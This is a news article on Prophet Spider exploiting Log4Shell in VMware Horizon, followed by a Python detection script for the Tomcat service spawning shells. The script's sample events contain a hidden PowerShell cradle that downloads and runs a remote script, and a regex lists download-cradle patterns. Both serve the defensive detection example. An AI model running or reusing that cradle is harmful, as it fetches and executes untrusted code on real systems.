A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.
In a blog post published Wednesday, BlackBerry researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.
The researchers explained that after exploiting the Log4Shell vulnerability to gain access to a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers.
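As an added example (not code from the BlackBerry report), the detection approach described above expressed in Python over constructed Sysmon-style process-creation events: it flags ws_TomcatService.exe spawning a shell, and raises the severity when the command line carries a PowerShell download cradle. The event field names, file paths, hostnames and URL are assumptions.

```python
import ntpath
import re
from typing import Dict, Iterable, List

# Parent process the article names as the detection anchor (VMware Horizon's Tomcat service).
HORIZON_TOMCAT = "ws_tomcatservice.exe"
# Child images worth flagging when spawned by the Tomcat service.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Common download-cradle indicators (assumption: the second-stage fetch resembles one of these).
DOWNLOAD_PATTERNS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer|-enc(odedcommand)?\b",
    re.IGNORECASE,
)

def _basename(path: str) -> str:
    return ntpath.basename(path).lower()

def classify(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for one process-creation event.
    Expected keys (Sysmon Event ID 1 style, assumed): parent_image, image, command_line."""
    if _basename(event.get("parent_image", "")) != HORIZON_TOMCAT:
        return "none"
    if _basename(event.get("image", "")) not in SHELL_CHILDREN:
        return "none"
    if DOWNLOAD_PATTERNS.search(event.get("command_line", "")):
        return "high"    # Tomcat spawned a shell that fetches something: matches the described second stage
    return "medium"      # Tomcat spawning any shell is unusual and worth triage

def detect(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a stream of events and return only the hits."""
    findings = []
    for ev in events:
        sev = classify(ev)
        if sev != "none":
            findings.append({"severity": sev, "host": ev.get("host", "?"), "command_line": ev.get("command_line", "")})
    return findings

# Constructed sample events (not real telemetry); paths, hosts and URL are made up.
TOMCAT_PATH = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "hz-cs01", "parent_image": TOMCAT_PATH, "image": PS_PATH,
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/x.ps1')\""},
    {"host": "hz-cs01", "parent_image": TOMCAT_PATH, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"host": "hz-cs02", "parent_image": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "command_line": "powershell Invoke-WebRequest http://intranet/report.csv -OutFile r.csv"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"], f["host"], f["command_line"])
```

The third sample shows why the parent-process check matters: the same download cmdlet under explorer.exe is ordinary user activity and is not flagged.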